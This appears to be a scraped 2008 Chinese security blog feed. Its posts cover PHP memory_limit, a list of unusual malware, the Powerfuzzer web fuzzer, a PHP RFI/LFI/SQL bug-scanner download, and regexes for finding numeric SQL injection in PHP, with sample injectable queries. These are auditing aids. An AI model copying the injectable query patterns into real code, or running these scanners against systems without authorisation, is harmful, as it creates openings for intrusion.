PHP_INI_ENTRY_EX("highlight.keyword", HL_KEYWORD_COLOR, PHP_INI_ALL, NULL,

php_ini_color_displayer_cb)
PHP_INI_ENTRY_EX("highlight.string", HL_STRING_COLOR, PHP_INI_ALL, NULL,

php_ini_color_displayer_cb)

more lines ... ...

PHP_INI_END()
/* }}} */

-- ./main/main.c --

在最新版本的PHP中 memory_limit 由原来的 8M 修改成了 16M

最有趣的病毒

Tue, 19 Aug 2008 00:16:15 +0800

杀毒软件公司Panda Security最近列出了过去的六个月中出现的最意思的病毒.其中就有最恐怖病毒、最爱干净病毒和最具资讯功能病毒.
最恐怖病毒-MalwareProtector2008和AdvancedXpFixer会一点点得“吃掉”被感染电脑的桌面.实际上,这两个病毒是由一个杀毒软件公司制造的.该公司希望通过这种方式让用户使用他们的产品.
最爱干净病毒-Tixcet.A会删除用户硬盘上的所有文件.

绑架者病毒-PGPCoder.E和“ransomware”.该病毒会对用户电脑硬盘上的数据进行加密,然后向用户索要金钱.用户只有花钱才能得到解密密码.

最浪漫病毒-Nuwar.OL,Nuwar.QI和Valentin.E用浪漫的内容来勾引用户点击激活它从而感染电脑.

最具资讯功能病毒-尽管该病毒名为Romeo.C,它却能让你获取丰富的资讯信息.Rome.C不仅窜改windows注册表,还会在发作时弹出新闻窗口.

骗子病毒- Manclick.A, Manclick.B 和Manclick.C会像别的病毒一样,让用户觉得他们是安装了一个合法的软件,而非恶意软件.它们还会将用户引向钩鱼网站,收集用户隐私用于网上诈骗.

最具欺骗性病毒-蠕虫病毒FakeDeath通过散布消息称古巴总统菲德尔·卡斯特罗已死亡来吸引用户点击而感染电脑.

《启示录》布道者病毒-RenameLoi.A有电脑上运行时会发出烦人的噪音并弹出有关反基督教和审判日的窗口.

酷酷猪病毒-当用户运行含有MSNWorm.EI蠕虫病毒代码的文件时,电脑上就弹出一张化了妆带着项链和太阳眼镜的猪的图片.

最吵病毒-中了BeepBeep.A病毒后,用户进入Windows或打开系统文件时电脑会发出一串烦人的噪声.

翻译: itrans

Powerfuzzer

Sun, 17 Aug 2008 01:32:38 +0800

软件主页：http://powerfuzzer.sourceforge.net/ (via tr4c3)

Powerfuzzer is a highly automated web fuzzer based on many other Open Source fuzzers available (incl. cfuzzer, fuzzled, fuzzer.pl, jbrofuzz, webscarab, wapiti, Socket Fuzzer) and information gathered from numerous security resources and websites. It is capable of spidering website and identifying inputs.

Don't have a clue what a Fuzzer/Fuzz testing is ? Not a problem, read on here

Currently, it is capable of identifying these problems:
- Cross Site Scripting (XSS)
- Injections (SQL, LDAP, code, commands, and XPATH)
- CRLF
- HTTP 500 statuses (usually indicative of a possible misconfiguration/security flaw incl. buffer overflow)

Designed and coded to be modular and extendable. Adding new checks should simply entail adding new methods.

Screenshots made during demo tests against ACUNETIX test website testphp.acunetix.com. Myself, as well as this project/website is not in affiliation with ACUNETIX in any shape and form.

500)this.width=500;" />
Main Screen

500)this.width=500;" />
Scanning

500)this.width=500;" />
Scanning with finding

500)this.width=500;" />
HTTP POST form scanning

500)this.width=500;" />
Final report with findings

Project news
06/21/2008 - Powerfuzzer v1 BETA available. Several bugfixes (see CHANGES.txt). Improved BASIC AUTH and Cookie support.

02/22/2008 - Yay ... webbsite is ready. Feel free to dl the ALPHA version, some features don't work quite well yet. Need volunteers to help. Please contact me if you're intersted.

TODO
IMHO, In order of importance:

-add NTLM support

-add custom check field to GUI (you can specify parameters that should be passed to fuzzer module in the GUI interface)

-modularize checks perfomed by the scanning engine, so that users can add their customized checks/modules/plugins

-add threading to scanning engine (for super fast scanning)

-improve GUI/reporting

-documentation/tutorials

Talks
Yapa ... Yapa .... Yapa

FAQ

Documentation
We are actively working on the documentation.

Prerequisites and Installation
It is platform independent, hence powerfuzzer should run on Windows/Linux/Unix (Tested on Windows XP SP2 and Linux). Install Python (Testted with Python 2.5), wxPython (Tested with wxPython 2.8), HTML Tidy Library, ctypes, TidyLib Python wrapper and you're ready to go.

To start using the application unzip the package and double click, execute powerfuzzer.py

Mailing List
None yet

License
powerfuzzer is an Open Source software package. It is licensed under the GNU General Public License Version 2.

Download
You can download a release package with source code:

Here
Author(s)
The project leader is Marcin Kozlowski (marcinguy '@' yahoo.com). He is an active contributor and researcher to Open Source projects and information security arena (tools, modules, exploits, research)

PHP Bug Scanner (Rfi,Lfi,SqL ...)

Sun, 17 Aug 2008 01:31:37 +0800

PHP Bug Scanner (Rfi,Lfi,SqL ...)

500)this.width=500;" />

下载地址：http://rapidshare.com/files/131400238/PHP_Bug_Scanner.rar.html

EditPlus查找PHP源码简单数字型注入的正则表达式

Sun, 17 Aug 2008 01:31:04 +0800

作者：neeao

今天看一个项目代码，文件不多，不过每个文件中都N多注入，一个一个看实在太累，索性花了点时间，弄了个正则表达式，搜索出来，然后再将安全的筛选出去。省了不少时间的说。

1.查找select、update、delete语句
((select|SELECT|update|UPDATE|delete|DELETE)+.*(from|FROM|set|SET)+.*(where|WHERE)+.*)
查询语句,对于没有条件判断的基本不存在注入问题，因而仅搜索此语句即可
例子：
select * from user where

2.简单的数字型注入
((select|SELECT|update|UPDATE|delete|DELETE)+.*(from|FROM|set|SET)+.*(where|WHERE)+.*=[ ]?["]?["]?\$)
能找到select、update delete三种语句，5种格式的整形注入，如：
直接变量传入
select * from guess where id=$subject_id
update guess set is_valid=0 where id=$subject_id
delete from guess where id=$subject_id
=与变量之间存在空格
select * from guess where id= $subject_id
update guess set is_valid=0 where id= $subject_id
delete from guess where id= $subject_id
变量双引号
select * from guess where id="$subject_id"
update guess set is_valid=0 where id="$subject_id"
delete from guess where id="$subject_id"
=与双引号之间存在空格
select * from guess where id= "$subject_id"
update guess set is_valid=0 where id= "$subject_id"
delete from guess where id= "$subject_id"
=与引号、双引号之间存在空格
select * from guess where id= " $subject_id"
update guess set is_valid=0 where id= " $subject_id"
delete from guess where id= " $subject_id"

其实自己发现其他的一些漏洞也可以找到相应关键字寻找的，当然这些仅限于比较容易看出来的漏洞了，^_^。